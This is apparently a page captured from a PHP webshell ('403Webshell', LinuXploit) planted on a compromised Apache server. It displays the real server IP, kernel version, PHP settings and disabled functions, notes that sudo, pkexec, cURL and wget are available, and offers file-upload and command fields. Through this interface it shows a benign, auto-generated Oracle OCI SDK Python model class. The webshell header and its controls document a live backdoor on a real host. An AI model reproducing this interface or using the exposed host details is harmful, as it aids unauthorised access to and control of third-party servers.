403Webshell
Server IP : 103.119.228.120  /  Your IP : 216.73.216.224
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els17.x86_64 #1 SMP Mon Feb 24 04:58:14 UTC 2025 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /usr/local/ssl/lib/mysqlsh/lib/python3.9/site-packages/oci/cims/models/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/local/ssl/lib/mysqlsh/lib/python3.9/site-packages/oci/cims/models/sub_categories.py
# coding: utf-8
# Copyright (c) 2016, 2025, Oracle and/or its affiliates.  All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.

# NOTE: This class is auto generated by OracleSDKGenerator. DO NOT EDIT. API Version: 20181231


from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel  # noqa: F401
from oci.decorators import init_model_state_from_kwargs


@init_model_state_from_kwargs
class SubCategories(object):
    """
    List of subcategories under a service.
    """

    def __init__(self, **kwargs):
        """
        Initializes a new SubCategories object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param service_category:
            The value to assign to the service_category property of this SubCategories.
        :type service_category: dict(str, str)

        :param schema:
            The value to assign to the schema property of this SubCategories.
        :type schema: str

        :param has_sub_category:
            The value to assign to the has_sub_category property of this SubCategories.
        :type has_sub_category: str

        :param sub_categories:
            The value to assign to the sub_categories property of this SubCategories.
        :type sub_categories: list[oci.cims.models.SubComponents]

        """
        self.swagger_types = {
            'service_category': 'dict(str, str)',
            'schema': 'str',
            'has_sub_category': 'str',
            'sub_categories': 'list[SubComponents]'
        }

        self.attribute_map = {
            'service_category': 'serviceCategory',
            'schema': 'schema',
            'has_sub_category': 'hasSubCategory',
            'sub_categories': 'subCategories'
        }

        self._service_category = None
        self._schema = None
        self._has_sub_category = None
        self._sub_categories = None

    @property
    def service_category(self):
        """
        Gets the service_category of this SubCategories.
        Subcategory list.


        :return: The service_category of this SubCategories.
        :rtype: dict(str, str)
        """
        return self._service_category

    @service_category.setter
    def service_category(self, service_category):
        """
        Sets the service_category of this SubCategories.
        Subcategory list.


        :param service_category: The service_category of this SubCategories.
        :type: dict(str, str)
        """
        self._service_category = service_category

    @property
    def schema(self):
        """
        Gets the schema of this SubCategories.
        Schema of a subcategory.


        :return: The schema of this SubCategories.
        :rtype: str
        """
        return self._schema

    @schema.setter
    def schema(self, schema):
        """
        Sets the schema of this SubCategories.
        Schema of a subcategory.


        :param schema: The schema of this SubCategories.
        :type: str
        """
        self._schema = schema

    @property
    def has_sub_category(self):
        """
        Gets the has_sub_category of this SubCategories.
        Flag to identify if subComponent is present


        :return: The has_sub_category of this SubCategories.
        :rtype: str
        """
        return self._has_sub_category

    @has_sub_category.setter
    def has_sub_category(self, has_sub_category):
        """
        Sets the has_sub_category of this SubCategories.
        Flag to identify if subComponent is present


        :param has_sub_category: The has_sub_category of this SubCategories.
        :type: str
        """
        self._has_sub_category = has_sub_category

    @property
    def sub_categories(self):
        """
        Gets the sub_categories of this SubCategories.
        The sub component list for MOS Taxonomy.


        :return: The sub_categories of this SubCategories.
        :rtype: list[oci.cims.models.SubComponents]
        """
        return self._sub_categories

    @sub_categories.setter
    def sub_categories(self, sub_categories):
        """
        Sets the sub_categories of this SubCategories.
        The sub component list for MOS Taxonomy.


        :param sub_categories: The sub_categories of this SubCategories.
        :type: list[oci.cims.models.SubComponents]
        """
        self._sub_categories = sub_categories

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        if other is None:
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other

Youez - 2016 - github.com/yon3zu
LinuXploit